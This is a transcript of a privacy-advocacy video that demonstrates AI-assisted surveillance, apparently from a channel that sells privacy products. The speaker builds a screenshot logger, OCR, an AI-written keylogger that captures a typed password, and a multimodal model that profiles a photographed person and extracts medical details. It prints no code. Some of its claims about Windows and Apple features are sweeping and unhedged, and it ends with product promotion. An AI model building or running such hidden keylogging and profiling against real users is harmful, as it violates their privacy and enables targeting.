Summary
Transcript
To demonstrate this for you, we’re going to construct example AI agents and show you how what I’m saying is possible. And I’m going to use AI as well to help me build this. Are you excited yet? If you are, then make sure to stay right there. Just to establish what I’m going to be using here in this demo, I’m using a single laptop with an NVIDIA GE Force RTX 3050 and lots of RAM, though we will likely never use more than 32 GB. For software, I have Olama preloaded as I’ve discussed in last video, then using Visual Studio Code or VS Code as my programming environment, I wrote my own AI chatbot which I call MyAI.
Plus I made the AI write the code that we are using as AI agents. Now the point of this video is not to teach you programming. The bulk of you are not programmers. But just pay attention to the results of the programs I run. I show you how it is made though so you know these are real. So let’s establish some objectives. Number one, in order to demonstrate the dangers of a Windows recall or an Apple client-side scanning, I will show you that it is possible for some background process to examine your screen using screenshots.
Number two, in addition, an OS can do key logging which is used to record everything you do on the computer with keystrokes. This is another feature now built into Windows 11. Number three, using AI, we will see if the AI can make sense out of this unstructured data in the form of screenshots and text and see if it can make intelligent observations that it can report to another party. Number four, the premise here is that none of your raw data ever leaves your computer. But the brief analysis of what the AI finds could be sent to someone else that’s behaving like spyware but in a different way.
The first step to demonstrate a Windows Recall is to take screenshots since that is the mechanism described by Microsoft. This is the first Python program I will show that was initially generated by the AI. There were lots of bugs by the way so I had to rewrite it for this demo. But because the AI built most of it, it took a very short amount of time to finish. Let me just show you though how I went about this. And again, the final code I made looked quite a bit different as I challenged the AI to change what it was doing.
Let me run this MyAI chatbot. The first thing I will ask for is the model I want to use. If I leave it blank, it will use llama3 model which seems to generate the best code. Here’s the general instructions I gave the AI. Write Python code of a program that takes continuous screenshots every 5 seconds. Then if the screen changes substantially, meaning if the content displayed is significantly different, then save the image. Otherwise don’t save. Save the screenshots to the folder Homeworker documents vs code test screenshots. Measure the screen changes as significantly different by doing a comparison with the last saved image.
For example, if the difference in the image is more than 20%, then save the image. This choice is arbitrary by the way. We just don’t want to waste space with duplicate images if your computer is idle. We only want to see changing screens. Now I will give MyAI the instruction to write the code as you see here. By the way, MyAI saves the queries into my queries folder so I can look back and see what it generated. This makes it easy to see the history and cut and paste it into vs code. In real life, the model made several errors and I had to prompt it several times to change the program.
This query log makes it easy for me to cut and paste the code directly into vs code as you can see here. Let me just hit the execute button on vs code. And then flipping through the important images for our demo, I just have to make sure that I allow 5 seconds before I flip. This should have been captured now and I can stop this program. Okay, if you look at my screenshots folder here, it kept a bunch of screenshots. And to save time, I’m going to rename the important ones and move it to my images folder so I can easily find them.
I’m going to prepend the name screenshot to them so we can recognize them. Again, they’re the same images generated by this program, but I’m just renaming them since the original images use a timestamp for a name and that’s hard to type. But I just want to make clear how these were generated. So some of these are the screenshot images I specifically want to use. Now, in this task, one of the images needs to be pre-processed. This may not be necessary depending on the AI model used, but the model I have available which is lava is not really able to do exact OCR or optical character recognition of images.
So to do that, I’m going to write another program and this program will take an image as input, then using OCR it will extract the text content it can read on the screen. OCR is a type of AI and it’s very small. Fortunately, there’s already a pre-written program called Tesseract from Google which does OCR. All I have to do is integrate this into my Python code as I did here. I didn’t have to use AI to generate this since it’s too simple. But the general purpose of this program is to take any image as input and the output will be a text file with the results of the OCR scan.
And the specific screenshot I’m concerned about is the medical record which has some pretty private data on it. Let’s see if my OCR program can extract the contents. I’m going to run this program my OCR.py and as input I will use screenshot nurse.ping. Okay, that ran and then if we look at my logs folder it shows the generated result which has the same name as the original file and ends with OCR.txt. Now, if we examine this file it will show that the text has been extracted from the image now and it is now in this text file.
So this OCR.txt file will be another input to our AI later on. This is the scariest concept of all and it is quite easy to build and demonstrate. A little program can be running in the background to trap every keystroke you make and keep it in a file. Now, the significance of this is that if you’re using some messaging app with encryption then that encryption is pointless since the key logger has a record of your text before encryption. Once again, I will use my AI to write the Python code for me and this one I did not have to modify.
I just had to take it as is and run it. I put this in VS code. Now, let’s run it. From here on anything I type will be captured by this key logging program mykeylogger.py. For this demo, I’m just going to type in a Braxme chat screen which we can presume to be a private conversation. But we will try to capture private content here. Let me type this. My banking username is BraxTV and my password is pass and so on. By the way, any random text I type will end up in the key logging program.
Now, let’s check the results. As you can see here, the program created a log of the text called keylog.txt and you can see it captured the keystrokes in the background. So once again, this key log file can be input for the AI later on like use it to extract a password. I don’t have to tell you how scary it is if a hacker can read this file and this is the new threat that an AI could read this file. Now, the next demonstration is for a Python program to look at the screenshot images we made previously and we’ll see if the AI can understand what’s in the photo.
My AI chatbot has some custom features. If it knows I’m using lava as my model, it will ask me for the image file name. Lava is a multimodal AI. That means it can accept both text and images as input. We’re going to try several things here. First, we will test out the bare screenshot. We named that screenshot nature.ping. So I’ll give that to the AI. Then we’ll ask the AI, what do you see here? And here’s the response. A pretty nice and benign response to a scene that’s very natural. Now, let me load this image I showed you earlier.
This one I named screenshot, julysmart.ping. Again, let’s ask the AI what it sees. And here’s the response. This demonstrates the ability of the AI to understand the context of the image. Now, let me change the approach here. Instead of just describing it, let me see if the AI can generate an opinion. Loading the same image, I will now ask if this person is a political activist. And here you will see a more specific response, confirming that we are looking at a political activist. This is demonstrating to you that the AI can not only see context, but can draw a conclusion that could be revealing to another party interested in particular kinds of people.
Now, the analysis of each image is automatically saved to a file by my AI program. So you can see the description of each photo that I process, and it is in my logs folder. This would be a similar concept to what an Apple neural hash would be when their media analysis deprogram examines photos, except it could encrypt it. And also the same kind of analysis can be done by Windows Recall. So in practice, this kind of program would generate an accompanying text file with a description of every image or screenshot captured. In the Windows Recall description, Microsoft covered all the bases by capturing data in text using key loggers, possibly OCR, as well as image processing as I just showed.
But if the image is text, we can just feed the text directly into the AI and then see if the AI can evaluate it and tell us what some of this captured information is. A possibility is that the captured text can be from key logging and has personally identifiable information or PII. And if the AI can read it and assess it, then it could then make a general conclusion about all the content it has seen. So though we used the key logging example to show how private things you type can be recorded, let’s use the more complex document which is the medical record we did an OCR on.
This was a two-step process as you may recall. The medical information was captured by a screenshot, then an OCR program read that content and created the text file automatically. Now I will have the AI read that text file and we will ask it questions. Again, here I’m going to run my AI, but I will select a model version that allows me to supply a text context, which I call llama3.context file. The OCR file is named screenshot nurse.ping OCR.txt, which we will supply as input. Then I will ask the first question, which is, who’s the patient here? And there’s a response, when was this patient seen? And there’s a response, is this person healthy? And there’s a response.
In this example, again, we’re asking the AI to draw some observations from the unstructured data it receives. As you can see, depending on the question, some really private information can be extracted. So what have we learned here? What I’ve demonstrated looks like fun, but unfortunately it’s not some game. Windows Recall, which Microsoft supposedly recalled, works similarly to what I described here. The Apple client-side scanning, which occurs with the media analysis demodule, evaluates photos and creates a description in what they call a neural hash. This is very similar to what I demonstrated is done by the multimodal model lava.
So though I show it here in a very rudimentary example, I’m just doing a proof of concept that the AI agent implementation I show here is trivial to do. The premise is that the data never leaves the device, but the AI can be the tool to observe what happens to the device, which can then be used to deliver information to a government or to profile you. It’s a way to evade and hide privacy concerns. The main issue is that hidden agents like this can exist when the AI model operates in a hidden way inside an operating system like Windows, macOS, iOS, or Android.
The countermeasure to all this is to concern yourself with what operating system you are using on both your computers and phones. If you’re using a Linux OS as I am in this demo, or if your phone is running an open source OS like AOSP, which is used on the Google phones, then there would be no hidden AI agents. That’s the problem with proprietary operating systems. You never know what it’s doing in the background. Understand that the OS does not need to move your data around. All it needs is to pass a conclusion to HQ.
So someone could ask, find some right-wing political activist at this location, and an AI could do the finding and report found. What I refer to as AI agents are just basically little programs that directly interact with the AI model. They either provide input to the model or query it on the output N and do something else, like send a message. Already some agents are in operation like Windows Recall or macOS Media Analysis D module. And there could be a lot of smaller ones as I described here. Also in the case of Apple and Microsoft, it is clear based on their explanations that a local smaller AI is able to communicate with a larger cloud-based AI to supplement its knowledge.
This is where an external hook can exist from local AI data to cloud AI data. We’ll get into more of this with more specific explanations. What I’ve done here is just expose something that so far no one is fully describing in the risks of embedded AIs. AI can be made safe under the correct environment, which I’m teaching you about. But if you just accept what is being provided to you, then it can be dangerous, especially if it’s embedded into the OS. Folks, as we switch to an AI-driven world, what I’ve been teaching about privacy seems to have even more importance.
The next level of danger is when the AI knows you personally. Fortunately, we can stop that with products I’ve already made and products that support this channel. We have the Google phones running AOSP that do not pass information to Big Tech and are immune from such things as embedded AI and AI agents. We have a Brax virtual phone product, which allows you to have inexpensive phone numbers, which you can use to keep your identity away from Big Tech for future AI intelligence. We have Brax mail that keeps your identity private, so it cannot be harvested for AI data later on.
We have bytes VPN and Brax router that hides your IP address, which is a major identifier that can be harvested to identify our past actions. All these products can be found on my social media platform BraxMe. This platform is a place for people to discuss privacy and over 100,000 people are there talking about privacy issues daily. There’s a store on there with all these products. Come visit us, chat with the community and support what we do. Thank you for watching and see you next time. [tr:trw].